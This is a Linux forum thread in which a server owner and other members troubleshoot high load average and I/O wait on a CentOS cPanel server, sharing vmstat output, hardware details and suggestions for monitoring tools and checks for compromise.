Linux - SoftwareThis forum is for Software issues.
Having a problem installing a new program? Want to know which application is best for the job? Post your question in this forum.
Notices
Welcome to LinuxQuestions.org, a friendly and active Linux Community.
You are currently viewing LQ as a guest. By joining our community you will have the ability to post topics, receive our newsletter, use the advanced search, subscribe to threads and access many other special features. Registration is quick, simple and absolutely free. Join our community today!
Note that registered members see fewer ads, and ContentLink is completely disabled once you log in.
If you have any problems with the registration process or your account login, please contact us. If you need to reset your password, click here.
Having a problem logging in? Please visit this page to clear all LQ-related cookies.
Get a virtual cloud desktop with the Linux distro that you want in less than five minutes with Shells! With over 10 pre-installed distros to choose from, the worry-free installation life is here! Whether you are a digital nomad or just looking for flexibility, Shells can put your Linux machine on the device that you want to use.
Exclusive for LQ members, get up to 45% off per month. Click here for more info.
So I've done some reading about how to understand the stats that the top command gives you and I am fairly confident that my problem is an I/O problem. As the wa value when my server load goes through the roof is generally in the 90%+ range.
So then I used the vmstats and ifconfig to see if it was a disk problem and/or a network problem, but I'm not sure what is considered "High values" when I am looking at this data.
vmstats
Code:
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
1 1 1034092 20608 4536 94468 5 3 214 53 8 7 5 1 92 3 0
I am pretty sure the bi and bo values are the values I need to be interested in. Granted this print isn't during the high server load, but so I am going to use this as a base now but what would be considered high? If it was twice as high as this, is that a problem?
Now this is a little more complicated, but I think I am searching for the RX packets and TX packets which are currently 516255425 and 802790881 respectively. Now just looking at those numbers, one would assume that they are extremely high. However, my server load at the time of this print was only around .70 w/ wa of 20%.
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
1 20 1159932 14208 5284 96364 5 3 214 54 0 8 5 1 91 3 0
At the time of the second measurement the load average was 24.93 but no application apparently maxing out RAM or CPU, but with 1GB swap being used and a 97.7% wait state you have to search for the bottleneck in a different way. Rebooting the machine returns the system to a "known good" state, and then running 'atop', storing data continuously and over a longer period, could help to trace back peaks and narrow down to processes more easily. (Also see 'dstat', 'collectl', 'atsar', SAR.) It would also be interesting to know more HW and SW (services mainly) specs, any anomalies in system or daemon logs and if this behaviour started at some point (SW installation? updates?, configuration changes?).
See those status "D" tasks ? - they are all counted in loadavg.
And they are probably all waiting on disk I/O. Looks like you have a under/badly configured disk farm. Either get some more devices or manage the things that are going to exacerbate the situation. Don't run a yum update against updatedb say ...
Well I attempted to reboot the server, but it's having a difficult time coming back on. When it did finally come back on, it took forever for me to login. Once I did login, the server load was already at 0.54, 2.21, 1.35 so something is defiantly wrong here. Then the server suddenly went down again for a reboot (I'm thinking it did this because after a few minutes of the server not coming back on, I went to my Data center's control panel and initiated a reboot from it, so I think it was just delaying the message) so now I am waiting on it to come back online again.
procs -----------memory---------- ---swap-- -----io---- --system-- -----cpu------
r b swpd free buff cache si so bi bo in cs us sy id wa st
0 0 0 191692 27548 477972 0 0 4054 63 692 376 8 2 50 40 0
Intel Core2Duo E6750 DC
1GB DDR2 667
250GB SATA HDD
500GB SATA HDD
My software is:
CENTOS 5.3
cPanel 11.24.5-R38506 - WHM 11.24.2 - X 3.9
Along with those.. I also have two Unreal Tournament 10 person servers hosted on the server (hardly ever have any players) and a TeamSpeak 3 server (hasn't seen activity at all this month)
Run it sometime the numbers - particularly the short one - are upp-ish.
I will do this, I'm thinking this script is just looking to see how many processes are in the "D" state, since you mentioned that statuses in "D" state are all totaled in with the system load. Right?
Something I have just noticed. When I log into the server, though SSH/Putty it takes FOREVER. Like the "Login as:" text pops up instantly, I enter my username, then the password prompt appears immediately then when I enter my password it takes a really, really long time before it goes though. Like at least a minute to a minute and a half.
the commands atop, dstat, collectl, atsar did not work.
That's because you have to install them before you can use them. They should be in the default Centos repo or else RPMForge or EPEL.
- Are the two UT servers and the TS3 server the only publicly accessible services running? If not, what other services mainly run?
- Is cPanel (and maybe related paths on the server like /phpmyadmin?) only accessible from your management IP or IP range?
- Do the system or daemon logs show any "odd" lines involving 'links', 'wget' or any network tools?
- Are there by any chance oddly named files in your /tmp, /var/tmp or Apache docroot?
- Did this load problem start right from using the server or at some point? If the latter, can you trace back what happened at that point in terms of HW changes, SW installation or updates, reconfiguration?.
That's because you have to install them before you can use them. They should be in the default Centos repo or else RPMForge or EPEL.
- Are the two UT servers and the TS3 server the only publicly accessible services running? If not, what other services mainly run?
- Is cPanel (and maybe related paths on the server like /phpmyadmin?) only accessible from your management IP or IP range?
- Do the system or daemon logs show any "odd" lines involving 'links', 'wget' or any network tools?
- Are there by any chance oddly named files in your /tmp, /var/tmp or Apache docroot?
- Did this load problem start right from using the server or at some point? If the latter, can you trace back what happened at that point in terms of HW changes, SW installation or updates, reconfiguration?.
Yea, I realized that after I posted. I went Googling. Still not 100% sure on how to install them. I tried yum install atop but it didn't work.
No, the other service is a FTP server. The one that runs for cPanel, it also has a "public login" that is posted on one of my sites for people to upload specific files to. I monitor it daily, with logs that are emailed to me the people who login to it and what they do. Doesn't really get that much traffic.
Those things are only accessible through cpanel. You have to login to get to them.
What logs can I look at for those messages, because I use wget often to copy things to my server that are otherwise too large for me to try to download then FTP.
Files in my /tmp:
Buch of files that look similar to this; sess_381b2d464edc56d83b9026b9fa50d0dc then
.ICE-unix/
lost+found/
mysql.sock@
spamd-9952-init/
Looks like the same files in /var/tmp
Not sure where the apache doc root is?
No, the problem seems to happen every once in a while though it has seemed to become a bit more frequent. When I first got the server, I never noticed it. Then sometimes I'd notice the server load get really high, but then it would go away. I always assumed it was the Unreal Tournament servers (I had 5 running at one point plus a BF2 Demo server) but when I shut them down, the load didn't go away.
I am really, really thinking it might have something to do with Apache though. Not sure if it's a coincidence or not, but it seems that when the load is high and I shut down the httpd service the load goes back down. This doesn't explain why the server load is really high upon boot though.
LinuxQuestions.org is looking for people interested in writing
Editorials, Articles, Reviews, and more. If you'd like to contribute
content, let us know.